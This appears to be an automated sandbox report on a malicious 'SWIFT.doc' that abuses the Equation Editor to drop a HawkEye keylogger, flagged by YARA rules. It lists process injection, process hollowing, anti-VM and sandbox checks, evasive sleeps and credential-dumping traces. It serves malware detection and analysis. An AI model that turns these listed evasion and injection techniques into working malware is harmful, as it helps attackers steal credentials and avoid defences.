Source: Process Memory Space: izux978537.scr PID: 3016, type: MEMORY Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 10.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 9.2.izux978537.scr.2c0000.0.unpack, type: UNPACKEDPE Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 9.2.izux978537.scr.2c0000.0.raw.unpack, type: UNPACKEDPE Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 11.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 10.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 9.2.izux978537.scr.400000.1.unpack, type: UNPACKEDPE Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.izux978537.scr.400000.1.unpack, type: UNPACKEDPE Matched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
Source: 9.2.izux978537.scr.400000.1.unpack, u202d????????????????????????????????????????.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.izux978537.scr.400000.1.unpack, u202d????????????????????????????????????????.cs Cryptographic APIs: 'CreateDecryptor'
Source: 9.2.izux978537.scr.400000.1.unpack, u200b????????????????????????????????????????.cs Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 9.2.izux978537.scr.400000.1.unpack, u202a????????????????????????????????????????.cs Security API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
Source: 9.2.izux978537.scr.400000.1.unpack, u202a????????????????????????????????????????.cs Security API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
Source: 9.2.izux978537.scr.400000.1.unpack, u202a????????????????????????????????????????.cs Security API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
Source: 9.2.izux978537.scr.400000.1.unpack, u200d????????????????????????????????????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 9.2.izux978537.scr.400000.1.unpack, u200d????????????????????????????????????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: classification engine Classification label: mal100.phis.troj.spyw.expl.evad.winDOC@13/9@1/1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 10_2_0040F37C FindResourceA,SizeofResource,LoadResource,LockResource, 10_2_0040F37C
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$SWIFT.doc Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Mutant created: \Sessions\1\BaseNamedObjects\ae5d6307-0d62-4e92-938b-debeac1db00e
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD519.tmp Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr WMI Queries: IWbemServices::ExecQuery - SELECT ProcessorId FROM Win32_Processor
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: SWIFT.doc Virustotal: Detection: 44%
Source: SWIFT.doc ReversingLabs: Detection: 47%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown Process created: C:\Users\user\AppData\Roaming\izux978537.scr C:\Users\user\AppData\Roaming\izux978537.scr
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown Process created: C:\Users\user\AppData\Roaming\izux978537.scr C:\Users\user\AppData\Roaming\izux978537.scr
Source: unknown Process created: C:\Users\user\AppData\Roaming\izux978537.scr C:\Users\user\AppData\Roaming\izux978537.scr
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp2915.tmp'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp2916.tmp'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\izux978537.scr C:\Users\user\AppData\Roaming\izux978537.scr Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process created: C:\Users\user\AppData\Roaming\izux978537.scr C:\Users\user\AppData\Roaming\izux978537.scr Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process created: C:\Users\user\AppData\Roaming\izux978537.scr C:\Users\user\AppData\Roaming\izux978537.scr Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp2915.tmp' Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp2916.tmp' Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\izux978537.scr File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: SWIFT.doc Static file information: File size 1258700 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: c:\Projects\VS2005\mailpv\Command-Line\mailpv.pdb source: izux978537.scr, 00000009.00000002.2378186428.0000000002D68000.00000004.00000001.sdmp, vbc.exe, vbc.exe, 0000000B.00000002.2242831512.0000000000400000.00000040.00000001.sdmp

Data Obfuscation:

barindex
.NET source code contains potential unpacker
Source: 9.2.izux978537.scr.400000.1.unpack, u202a????????????????????????????????????????.cs .Net Code: ????????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Contains functionality to dynamically determine API calls
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 10_2_00404841 GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,#17,MessageBoxA, 10_2_00404841
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_0024A0D2 pushad ; ret 9_2_0024A0D9
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_0024F198 push edi; retf 9_2_0024F199
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_0024BAB0 pushad ; iretd 9_2_0024BAB1
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_0024A480 push esp; retf 001Ah 9_2_0024A489
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_0024EDAB push FFD2B0BAh; retf 9_2_0024EDB8
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005BA600 push ebx; ret 9_2_005BA601
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_0060747C push esp; retf 9_2_0060747D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 10_2_00412341 push ecx; ret 10_2_00412351
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 10_2_00412360 push eax; ret 10_2_00412374
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 10_2_00412360 push eax; ret 10_2_0041239C

Persistence and Installation Behavior:

barindex
Drops PE files with a suspicious file extension
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\izux978537.scr Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hktestfile[1].scr Jump to dropped file
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\izux978537.scr Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hktestfile[1].scr Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 10_2_0040FCBC memset,strcpy,memset,strcpy,strcat,strcpy,strcat,strcpy,strcat,GetModuleHandleA,LoadLibraryExA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 10_2_0040FCBC
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Yara detected AntiVM_3
Source: Yara match File source: Process Memory Space: izux978537.scr PID: 3016, type: MEMORY
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\izux978537.scr WMI Queries: IWbemServices::ExecQuery - SELECT MacAddress FROM Win32_NetworkAdapterConfiguration
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Roaming\izux978537.scr Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Thread delayed: delay time: 600000 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2604 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2604 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr TID: 2332 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1980 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr TID: 2244 Thread sleep count: 105 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr TID: 2244 Thread sleep time: -105000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr TID: 2052 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr TID: 1900 Thread sleep time: -1200000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr TID: 1900 Thread sleep count: 107 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr TID: 1900 Thread sleep time: -107000s >= -30000s Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\izux978537.scr WMI Queries: IWbemServices::ExecQuery - SELECT ProcessorId FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Roaming\izux978537.scr Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\izux978537.scr Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 10_2_0040702D FindFirstFileA,FindNextFileA,strlen,strlen, 10_2_0040702D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Windows\SysWOW64\config\systemprofile\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 10_2_00404841 GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,#17,MessageBoxA, 10_2_00404841
Enables debug privileges
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
.NET source code references suspicious native API functions
Source: 9.2.izux978537.scr.400000.1.unpack, u200d????????????????????????????????????????.cs Reference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Roaming\izux978537.scr Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Roaming\izux978537.scr Memory written: C:\Users\user\AppData\Roaming\izux978537.scr base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A Jump to behavior
Sample uses process hollowing technique
